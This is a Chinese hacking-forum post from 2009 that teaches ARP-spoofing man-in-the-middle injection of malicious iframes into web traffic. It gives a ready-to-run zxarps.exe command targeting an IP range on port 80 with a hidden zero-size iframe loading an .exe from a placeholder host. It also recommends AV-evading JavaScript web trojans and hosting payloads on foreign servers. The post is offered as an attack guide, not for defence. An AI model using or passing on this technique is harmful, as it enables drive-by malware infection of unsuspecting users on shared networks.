|
  
- 帖子
- 272
- 积分
- 608
- 威望
- 703
- 金钱
- 1365
- 在线时间
- 55 小时
  
|
arp 挂马算是一个新出的挂马方式 网上的资料觉的还是很少
所以就整理一下发出来
简单讲下arp欺骗
通常的arp欺骗的攻击方式是在同一vlan下,控制一台主机来监听密码,
但这样存在局限性:1.管理员经常不登陆,那么要很久才能监听到密码
目标主机只开放了80端口,和一个管理端口,且80上只有静态页面,那么很
难利用.而管理端口,如果是3389终端,或者是ssh2,那么非常难监听到密码.
不改动任何目标主机的页面或者是配置,在网络传输的过程中间直接插入挂马的语句.
正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机
arp中间人攻击时候: A---->C---->B
B---->C---->A
实际上,C在这里做了一次代理的作用
那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如 <iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了.
arp挂马的工具现在非常少
个人认为LZX开发的zxarps.exe非常好 11K超级小 命令行下工具
个人感觉命令行下的工具速度非常快 这个工具跟arpsniffer一样需要安
装winpacp驱动
如果是单纯的ARP嗅探我还是推荐cain 以前没怎么用过 用过一次才知道 真是好东西 不用安装驱动 可视化界面
在DOS下输入zxarps.exe就会有帮助信息
具体的我就不说了我只说一下挂马的参数
比如自己的机器是192.168.2.14
就输入zxarps.exe -idx 0 -ip 192.168.2.13-192.168.2.60 -port 80
-insert "<iframe src=http://www.xxx.cn/xx.exe width=0 height=0>". 这样192.168.2.13-192.168.2.60 中间任何一台主机打开网页就会发现被插入挂马代码
挂马的代码大家非常熟悉了 这里-idx 0 是网卡索引号 看几块网卡了
-port 80就是在80端口 后面就是挂马的地址 有时候会扫不到alive host或者扫到的很少 大家换下IP范围就可以了 成功后会显示sniffering..
还有就是用iframe打开挂马页面会是空白 但是刚才问了下呆子 他说是可以的
不过还是建议大家用JS挂马 网马现在还是06014免杀版的中马率比较
大家都去国外的服务器挂吧 哈哈 就说这么多 累死我了 大家支持下 |
|
发表于 2009-5-24 19:35
| 
发表于 2009-10-19 14:12
| 